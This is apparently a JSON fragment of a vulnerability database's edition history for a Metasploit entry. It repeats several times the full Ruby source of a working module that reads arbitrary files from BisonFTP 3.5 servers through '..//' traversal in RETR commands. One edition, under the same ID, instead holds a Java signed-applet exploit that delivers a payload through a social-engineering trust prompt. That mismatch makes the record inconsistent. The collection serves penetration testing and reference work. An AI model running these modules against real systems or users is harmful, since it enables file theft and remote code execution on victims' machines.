"viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-22T03:07:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-22T03:07:29", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-28T11:30:40", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-28T11:30:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-28T11:30:40", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-28T13:30:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-28T13:30:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-28T13:30:55", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "references", "sourceHref"], "edition": 49}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f4d66f1263e106dbd0d9bb71c33f83d7", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-05-28T20:21:00", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-28T20:21:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:21:00", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 50}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "3f2e63491bfa3e59abbd0619cc80c4c0", "type": "metasploit", "bulletinFamily": "exploit", "title": "Java Signed Applet Social Engineering Code Execution", "description": "This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks \"run\", the applet executes with full user permissions.\n", "published": "2010-12-07T20:43:53", "modified": "2018-03-01T14:41:28", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf"], "cvelist": [], "lastseen": "2019-05-29T04:56:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "ics", "idList": ["ICSA-19-148-01"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891806", "OPENVAS:1361412562310891807"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153103", "PACKETSTORM:153104"]}, {"type": "cve", "idList": ["CVE-2019-12378", "CVE-2019-12379", "CVE-2019-12381", "CVE-2019-12383", "CVE-2019-12382", "CVE-2019-12380", "CVE-2019-12372", "CVE-2019-12362", "CVE-2019-12361", "CVE-2019-12360"]}], "modified": "2019-05-29T04:56:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_signed_applet.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize( info = {} )\n super( update_info( info,\n 'Name' => 'Java Signed Applet Social Engineering Code Execution',\n 'Description' => %q{\n This exploit dynamically creates a .jar file via the\n Msf::Exploit::Java mixin, then signs the it. The resulting\n signed applet is presented to the victim via a web page with\n an applet tag. The victim's JVM will pop a dialog asking if\n they trust the signed applet.\n\n On older versions the dialog will display the value of CERTCN\n in the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the\n signature is not trusted (i.e., it's not signed by a trusted\n CA). The SigningCert option allows you to provide a trusted\n code signing cert, the values in which will override CERTCN.\n If SigningCert is not given, a randomly generated self-signed\n cert will be used.\n\n Either way, once the user clicks \"run\", the applet executes\n with full user permissions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'natron' ],\n 'References' =>\n [\n [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]\n ],\n 'Platform' => %w{ java linux osx solaris win },\n 'Payload' => { 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X PPC (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DisclosureDate' => 'Feb 19 1997'\n ))\n\n register_options( [\n OptString.new('CERTCN', [ true,\n \"The CN= value for the certificate. Cannot contain ',' or '/'\",\n \"SiteLoader\"\n ]),\n OptString.new('APPLETNAME', [ true,\n \"The main applet's class name.\",\n \"SiteLoader\"\n ]),\n OptPath.new('SigningCert', [ false,\n \"Path to a signing certificate in PEM or PKCS12 (.pfx) format\"\n ]),\n OptPath.new('SigningKey', [ false,\n \"Path to a signing key in PEM format\"\n ]),\n OptString.new('SigningKeyPass', [ false,\n \"Password for signing key (required if SigningCert is a .pfx)\"\n ]),\n ])\n end\n\n\n def setup\n load_cert\n load_applet_class\n super\n end\n\n\n def on_request_uri( cli, request )\n if not request.uri.match(/\\.jar$/i)\n if not request.uri.match(/\\/$/)\n send_redirect( cli, get_resource() + '/', '')\n return\n end\n\n print_status( \"Handling request\" )\n\n send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )\n return\n end\n\n p = regenerate_payload(cli)\n if not p\n print_error(\"Failed to generate the payload.\")\n # Send them a 404 so the browser doesn't hang waiting for data\n # that will never come.\n send_not_found(cli)\n return\n end\n\n # If we haven't returned yet, then this is a request for our applet\n # jar, build one for this victim.\n jar = p.encoded_jar(:random => true)\n\n jar.add_file(\"#{datastore[\"APPLETNAME\"]}.class\", @applet_class)\n\n jar.build_manifest(:main_class => \"metasploit.Payload\", :app_name => \"#{datastore[\"APPLETNAME\"]}\")\n\n jar.sign(@key, @cert, @ca_certs)\n #File.open(\"payload.jar\", \"wb\") { |f| f.write(jar.to_s) }\n\n print_status(\"Sending #{datastore['APPLETNAME']}.jar. Waiting for user to click 'accept'...\")\n send_response( cli, jar.to_s, { 'Content-Type' => \"application/octet-stream\" } )\n\n handler( cli )\n\n end\n\n\n def load_applet_class\n data_dir = File.join(Msf::Config.data_directory, \"exploits\", self.shortname)\n if datastore[\"APPLETNAME\"]\n unless datastore[\"APPLETNAME\"] =~ /^[a-zA-Z_$]+[a-zA-Z0-9_$]*$/\n fail_with(Failure::BadConfig, \"APPLETNAME must conform to rules of Java identifiers (alphanum, _ and $, must not start with a number)\")\n end\n siteloader = File.open(File.join(data_dir, \"SiteLoader.class\"), \"rb\") {|fd| fd.read(fd.stat.size) }\n # Java strings are prefixed with a 2-byte, big endian length\n find_me = [\"SiteLoader\".length].pack(\"n\") + \"SiteLoader\"\n idx = siteloader.index(find_me)\n len = [datastore[\"APPLETNAME\"].length].pack(\"n\")\n # Now replace it with the new class name\n siteloader[idx, \"SiteLoader\".length+2] = len + datastore[\"APPLETNAME\"]\n else\n # Don't need to replace anything, just read it in\n siteloader = File.open(File.join(data_dir, \"SiteLoader.class\"), \"rb\") {|fd| fd.read(fd.stat.size) }\n end\n @applet_class = siteloader\n end\n\n\n def load_cert\n if datastore[\"SigningCert\"]\n cert_str = File.open(datastore[\"SigningCert\"], \"rb\") {|fd| fd.read(fd.stat.size) }\n begin\n pfx = OpenSSL::PKCS12.new(cert_str, datastore[\"SigningKeyPass\"])\n @cert = pfx.certificate\n @key = pfx.key\n @ca_certs = pfx.ca_certs\n\n rescue OpenSSL::PKCS12::PKCS12Error\n # it wasn't pkcs12, try it as concatenated PEMs\n certs = cert_str.scan(/-+BEGIN CERTIFICATE.*?END CERTIFICATE-+/m)\n @cert = OpenSSL::X509::Certificate.new(certs.shift)\n @ca_certs = nil\n while certs.length > 0\n @ca_certs ||= []\n @ca_certs << OpenSSL::X509::Certificate.new(certs.shift)\n end\n\n if datastore[\"SigningKey\"] and File.file?(datastore[\"SigningKey\"])\n key_str = File.open(datastore[\"SigningKey\"], \"rb\") {|fd| fd.read(fd.stat.size) }\n else\n key_str = cert_str\n end\n\n # First try it as RSA and fallback to DSA if that doesn't work\n begin\n @key = OpenSSL::PKey::RSA.new(cert_str, datastore[\"SigningKeyPass\"])\n rescue OpenSSL::PKey::RSAError => e\n @key = OpenSSL::PKey::DSA.new(cert_str, datastore[\"SigningKeyPass\"])\n end\n end\n else\n # Name.parse uses a simple regex that isn't smart enough to allow\n # slashes or commas in values, just remove them.\n certcn = datastore[\"CERTCN\"].gsub(%r|[/,]|, \"\")\n x509_name = OpenSSL::X509::Name.parse(\n \"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=#{certcn}\"\n )\n\n @key = OpenSSL::PKey::DSA.new(1024)\n @cert = OpenSSL::X509::Certificate.new\n @cert.version = 2\n @cert.serial = 1\n @cert.subject = x509_name\n @cert.issuer = x509_name\n @cert.public_key = @key.public_key\n @cert.not_before = Time.now\n # FIXME: this will break in the year 2037 on 32-bit systems\n @cert.not_after = @cert.not_before + 3600 * 24 * 365 # 1 year\n end\n end\n\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>\\n|\n html << %Q|<body><center><p>Loading, Please Wait...</p></center>\\n|\n html << %Q|<applet archive=\"#{get_resource.sub(%r|/$|, '')}/#{datastore[\"APPLETNAME\"]}.jar\"\\n|\n vprint_line(html)\n if @use_static\n html << %Q| code=\"SiteLoader\" width=\"1\" height=\"1\">\\n|\n else\n html << %Q| code=\"#{datastore[\"APPLETNAME\"]}\" width=\"1\" height=\"1\">\\n|\n end\n html << %Q|</applet>\\n</body></html>|\n return html\n end\n\n\n # Currently unused until we ship a java compiler of some sort\n def applet_code\n applet = <<-EOS\nimport java.applet.*;\nimport metasploit.*;\n\npublic class #{datastore[\"APPLETNAME\"]} extends Applet {\n public void init() {\n try {\n Payload.main(null);\n } catch (Exception ex) {\n //ex.printStackTrace();\n }\n }\n}\nEOS\n end\nend\n\n=begin\n\nThe following stores a bunch of intermediate files on the path to creating the signature. The\nImportKey class used for testing was obtained from:\nhttp://www.agentbob.info/agentbob/79-AB.html\n\n system(\"rm -rf signed_jar/*\")\n File.open(\"signed_jar/cert.pem\", \"wb\") { |f| f.write(@cert.to_s + @key.to_s) }\n File.open(\"signed_jar/key.pem\", \"wb\") { |f| f.write(@key.to_s + @key.public_key.to_s) }\n File.open(\"signed_jar/unsigned.jar\", \"wb\") { |f| f.write jar.to_s }\n\n File.open(\"signed_jar/jarsigner-signed.jar\", \"wb\") { |f| f.write jar.to_s }\n system(\"openssl x509 -in signed_jar/cert.pem -inform PEM -out signed_jar/cert.der -outform DER\")\n system(\"openssl pkcs8 -topk8 -nocrypt -in signed_jar/key.pem -inform PEM -out signed_jar/key.der -outform DER\")\n system(\"java -cp . ImportKey signed_jar/key.der signed_jar/cert.der\")\n system(\"mv ~/keystore.ImportKey ~/.keystore\")\n system(\"jarsigner -storepass importkey signed_jar/jarsigner-signed.jar importkey\")\n\n jar.sign(@key, @cert)\n File.open(\"signed_jar/signed.jar\", \"wb\") { |f| f.write jar.to_s }\n\n=end\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T04:56:55", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 51}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f4d66f1263e106dbd0d9bb71c33f83d7", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", 